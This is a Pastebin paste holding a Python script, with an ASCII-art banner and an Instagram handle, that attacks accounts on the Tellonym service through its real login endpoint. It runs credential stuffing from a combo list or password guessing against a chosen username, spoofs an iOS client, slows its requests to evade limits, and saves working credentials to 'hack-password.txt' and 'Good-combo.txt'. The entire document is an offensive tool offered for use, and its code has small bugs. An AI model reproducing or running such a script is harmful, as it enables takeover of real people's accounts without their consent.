6g7r

تخمين تيلينيوم

Apr 25th, 2021 (edited)
471
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.10 KB | None | 0 0
  1. import requests
  2. import json
  3. import time
  4. print("""
  5.  
  6.  
  7.  
  8.  
  9. IG : @6g7r_here
  10. ███████████████████████████
  11. ███████▀▀▀░░░░░░░▀▀▀███████
  12. ████▀░░░░░░░░░░░░░░░░░▀████
  13. ███│░░░░░░░░░░░░░░░░░░░│███
  14. ██▌│░░░░░░░░░░░░░░░░░░░│▐██
  15. ██░└┐░░░░░░░░░░░░░░░░░┌┘░██
  16. ██░░└┐░░░░░░░░░░░░░░░┌┘░░██
  17. ██░░┌┘▄▄▄▄▄░░░░░▄▄▄▄▄└┐░░██
  18. ██▌░│██████▌░░░▐██████│░▐██
  19. ███░│▐███▀▀░░▄░░▀▀███▌│░███
  20. ██▀─┘░░░░░░░▐█▌░░░░░░░└─▀██
  21. ██▄░░░▄▄▄▓░░▀█▀░░▓▄▄▄░░░▄██
  22. ████▄─┘██▌░░░░░░░▐██└─▄████
  23. █████░░▐█─┬┬┬┬┬┬┬─█▌░░█████
  24. ████▌░░░▀┬┼┼┼┼┼┼┼┬▀░░░▐████
  25. █████▄░░░└┴┴┴┴┴┴┴┘░░░▄█████
  26. ███████▄░░░░░░░░░░░▄███████
  27. ██████████▄▄▄▄▄▄▄██████████
  28. ███████████████████████████
  29.  
  30.  
  31.  
  32.  
  33.  
  34. """)
  35. print("""
  36.  
  37. 1 - combo list
  38. 2 - Targeted username
  39. IG : 6g7r_here
  40. """)
  41. pp = input('1,2 : ' )
  42. if("2") in pp:
  43. us = input('user : ')
  44. password = input('file password : ')
  45. pd = password
  46. file = open(pd).read().splitlines()
  47. for file in file:
  48. url = "https://api.tellonym.me/tokens/create"
  49. headers = {
  50. "Host": "api.tellonym.me",
  51. "Content-Type": "application/json",
  52. "Accept": "application/json",
  53. "Connection": "keep-alive",
  54. "tellonym-client": "ios:2.65.0:488:14:iPhone13,3",
  55. "User-Agent": "Tellonym/488 CFNetwork/1206 Darwin/20.1.0",
  56. "Accept-Language": "en",
  57. }
  58. data = {
  59. "activeExperimentId": 0,
  60. "password": password,
  61. "country": "US",
  62. "deviceName": "6g7r’s iPhone",
  63. "deviceType": "ios",
  64. "lang": "en",
  65. "limit": 16,
  66. "email": us
  67. }
  68. time.sleep(8)
  69. req = requests.post(url, json=data, headers=headers)
  70. if "WRONG_CREDENTIALS" in req.text:
  71. print("Bad password : ",file)#IG : 6g7r_here
  72. elif "PARAMETER_MISSING" in req.text:
  73. print("Error password ! : ",file)
  74. elif "accessToken" in req.text:
  75. print("Good password ! : ",file)
  76. with open("hack-password.txt", "a") as mix:
  77.  
  78. mix.write(f"{file}\n")
  79. mix.close()
  80. token = json.loads(req.text)["accessToken"]
  81. else:
  82. print("Error !")
  83. if("1") in pp:
  84.  
  85. c = open('combo.txt', 'r').read().splitlines()
  86. for meow in c:
  87. split = meow.split(':')
  88. user = split[0]
  89. password = split[1]
  90. url = "https://api.tellonym.me/tokens/create"
  91. headers = {
  92. "Host": "api.tellonym.me",
  93. "Content-Type": "application/json",
  94. "Accept": "application/json",
  95. "Connection": "keep-alive",
  96. "tellonym-client": "ios:2.65.0:488:14:iPhone13,3",
  97. "User-Agent": "Tellonym/488 CFNetwork/1206 Darwin/20.1.0",
  98. "Accept-Language": "en"
  99. }
  100. data = {
  101. "activeExperimentId": 0,
  102. "password": password,
  103. "country": "US",
  104. "deviceName": "6g7r’s iPhone",
  105. "deviceType": "ios",
  106. "lang": "en",
  107. "limit": 16,
  108. "email": user
  109. }
  110. time.sleep(8)
  111. req = requests.post(url, json=data, headers=headers)
  112. if "WRONG_CREDENTIALS" in req.text:
  113. print(f"Bad combo:{user}:{password} ")
  114. elif "PARAMETER_MISSING" in req.text:
  115. print(f"Error combo ! :{user}:{password} ")
  116. elif "accessToken" in req.text:
  117. print(f"Good combo ! :{user}:{password} ")
  118. with open("Good-combo.txt", "a") as mix:
  119.  
  120. mix.write(f"{file}\n")
  121. mix.close()
  122. token = json.loads(req.text)["accessToken"]
  123. else:
  124. print("Error !")
  125.  
Add Comment
Please, Sign In to add comment